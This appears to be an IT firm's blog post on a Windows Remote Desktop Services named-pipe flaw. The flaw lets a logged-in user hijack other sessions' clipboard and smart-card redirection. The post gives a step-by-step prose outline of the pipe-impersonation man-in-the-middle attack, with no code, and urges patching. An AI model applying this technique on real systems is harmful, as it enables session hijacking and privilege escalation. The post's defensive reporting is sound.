Certain types of Remote Desktop Protocol (RDP) have been found with security bugs that could allow any standard, unprivileged user to access other connected users’ machines. Researchers have warned that if the bugs were exploited, there could be data-privacy issues, lateral movement and privilege escalation.
Inside attackers could view and modify other people’s clipboard data or impersonate other logged-in users with smart cards. Researchers found the bug lurking in Windows Remote Desktop Services. The bug dates back at least to Windows Server 2012 R2, which has led researchers to conclude that the latest versions of Windows, including client and server editions, are affected.
Some basics on RDP plumbing include the fact that RDP splits a single connection into multiple logical connections called virtual channels for handling different types of data. Some channels are responsible for the core functionality of RDP, such as graphical and input data, while other channels handle protocol extensions, such as clipboard, drive and printer redirection.
The vulnerability involves the attack surface presented by named pipes. These are a common method for interprocess communication in Windows, which work in a client/server model. Both sides specify the name of the pipe in the format: “\.pipename”; or, “\hostnamepipename”. Both the client and the server use the WriteFile and ReadFile functions to exchange data after the connection is established.
It’s common to have one server process that handles multiple clients by creating multiple pipe server instances, meaning that the server process will call CreateNamedPipe multiple times with the same pipe name. Researchers said: “Each time it will get a new server instance. When a client connects to a named pipe server, it connects to one instance. If there are multiple instances available, the client will connect to the one that was created first [FIFO, or first-in, first-out ordering].”
But because each call to CreateNamedPipe is independent, potentially malicious processes may create pipe server instances of the same name. Researchers outlined how simple the attack is, here:
- An attacker connects to a remote machine via RDP
- The attacker lists the open named pipes and finds the full name of the TSVCPIPE pipe
- The attacker creates a pipe server instance with the same name and waits for a new connection
- Once a new connection arrives, RDS creates its own pipe server instance for the session and a pipe client that will attempt to connect to it
- Because of the FIFO, the pipe client will connect to the attacker pipe server instance instead of the one created by the RDS service
- The attacker connects as a client to the real RDS pipe server instance
- The attacker holds both ends of the connection; they can act as man-in-the-middle (MitM), passing the data back and forth, viewing and (optionally) modifying it
RDP attacks are very common. But, this new vulnerability adds a twist, showing, “An example of an unconventional attack vector targeting RDP. Instead of tapping into the input side of the server/client as one usually does, we abused the RDP server internal mechanism as an entry point,” researchers said. While the researchers chose to focus on drive and smart-card redirection, they said they believe that the same technique would work with other types of devices, protocols and channels, such as printers, audio, USB devices and authentication redirection.
They’re “strongly” recommending applying the patch Microsoft issued on Tuesday (25th Jan 2022), given that “almost all Windows versions are affected.” They also suggested that developers of applications that use custom virtual channels “should check whether they are vulnerable and conduct their own security assessment.”
Last July, researchers took a look at the complexities of setting up RDP for remote work. They noted that the protocol itself “is not a secure setup” and therefore requires “additional security measures to keep workstations and servers protected.” Without proper security protocols, “organisations face several potential risks, including the increased risk of cyber attacks.”
The typical targets of RDP attacks tend to be small businesses, because they often lack the resources needed to protect against and respond to these threats. Cyber criminals target RDP vulnerabilities for a number of reasons, with the most common objectives including distributed denial of service (DDoS) attacks and ransomware delivery.
Cyber criminals have noted the increased use of RDP, as remote working has surged. Between Q1 and Q4 2020, attacks against RDP surged by 768%, while an October 2020 report identified that 47% of ransomware attacks were preceded by RDP compromise. Researchers said: “While RDP is required for normal system maintenance, it can’t be left to run on its own. Additional defences like establishing a zero-trust framework and having an automated method of quickly implementing firmware fixes are needed to ensure RDP is used safely.”
Neuways have plenty of alternatives to RDP for businesses to take advantage of. Microsoft Office 365 removes the need for RDP, as the shared Microsoft ecosystem provides an easy-to-use and share platform for businesses to interact and work collaboratively on.